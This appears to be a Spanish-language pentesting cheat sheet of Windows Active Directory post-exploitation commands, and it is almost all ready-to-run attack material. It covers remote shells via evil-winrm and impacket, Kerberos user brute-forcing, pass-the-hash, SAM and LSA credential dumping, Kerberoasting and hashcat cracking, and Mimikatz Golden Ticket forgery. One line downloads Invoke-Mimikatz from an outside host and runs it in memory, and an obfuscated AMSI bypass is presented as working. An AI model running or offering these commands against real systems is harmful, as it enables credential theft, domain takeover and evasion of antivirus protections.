# Ataques Post-Explotación

### Acceso con Shell

```bash
evil-winrm -i <target> -u <username> -p <password>
impacket-psexec dominio.local/<USER>@<IP>
impacket-wmiexec dominio.local/<USER>@<IP>
```

#### Enumeración de usuarios mediante fuerza bruta a Kerberos

{% code overflow="wrap" %}

```bash
kerbrute -domain <DOMAIN>.LOCAL -users <USER_LIST> -dc-ip <IP>
```

{% endcode %}

#### Pass the Hash

```bash
#Comprobar credenciales válidas
crackmapexec smb <IP/CIDR> -u <USER> -H <HASH> --local-auth

#Inicio de sesión PTH
evil-winrm -i <DOMAIN>.local -u <USER> -H "<HASH>"
impacket-psexec <USER>:@<IP> -hashes <LMHASH>:<NTHASH>
```

#### Extracción de hashes de la SAM

```bash
impacket-secretsdump <DOMINIO>.LOCAL/<USER>@<IP>
```

#### Cracking de hashes NTLM

```bash
hashcat -m 1000 hashes.txt rockyou.txt
```

### Extracción de datos del dominio

```bash
#Con bloodhound-python
bloodhound-python -u <USER> -p <PASSWORD> -d <DOMINIO>.LOCAL -ns <IP> -c All

#Con SharpHound (desde PowerShell)
#Desactivar Execution Policy
powershell -ep bypass
#Cargar el script
. .\SharpHound.ps1
#Ejecutar la función
Invoke-BloodHound -CollectionMethod All -Domain <DOMINIO>.LOCAL -ZipFileName file.zip
```

### Kerberoasting

```bash
#Extracción de hashes
impacket-GetUserSPNs <DOMAIN>.local/<USER> -dc-ip <IP> -request

#Cracking de hashes TGS-REP
hashcat -m 13100 hashes.txt rockyou.txt
```

```
```

### Mimikatz

{% code overflow="wrap" %}

```bash
#Básico
privilege::debug
sekurlsa::logonpasswords
lsadump::sam /patch
lsadump::lsa /patch

#Golden Ticket attack
lsa /inject /name:krbtgt
kerberos::golden /User:<FAKE_USER/ADMIN> /DOMAIN:<domain.tld> /sid:<SID> /krbtgt:<NTLM_KRBTGT_HASH> /id:500 /ptt
misc::cmd
dir \\<MACHINE_NAME>\c$

#Cargar Mimikatz desde un recurso externo sin tocar disco
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/EmpireProject/Empire/7a39a55f127b1aeb951b3d9d80c6dc64500cacb5/data/module_source/credentials/Invoke-Mimikatz.ps1')
#One-liners
invoke-mimikatz -command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords"'
invoke-mimikatz -command '"privilege::debug" "token::elevate" "lsadump::sam"'
```

{% endcode %}

### Evasión de antivirus

#### AMSI Bypass (Funcionando 12/2022)

{% code overflow="wrap" %}

```powershell
#Desactivar Execution Policy
powershell -ep bypass
#Comando Bypass
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
#Forzando protocolos para evitar errores
$TLS12Protocol = [System.Net.SecurityProtocolType] 'Ssl3 , Tls12'
[System.Net.ServicePointManager]::SecurityProtocol = $TLS12Protocol
```

{% endcode %}

### Otros ataques

#### Group Policy Preferences (GPP Attack)

{% embed url="<https://adsecurity.org/?p=2288>" %}

#### Zerologon

{% embed url="<https://github.com/thatonesecguy/zerologon-CVE-2020-1472>" %}

#### PrintNightmare

{% embed url="<https://github.com/m8sec/CVE-2021-34527>" %}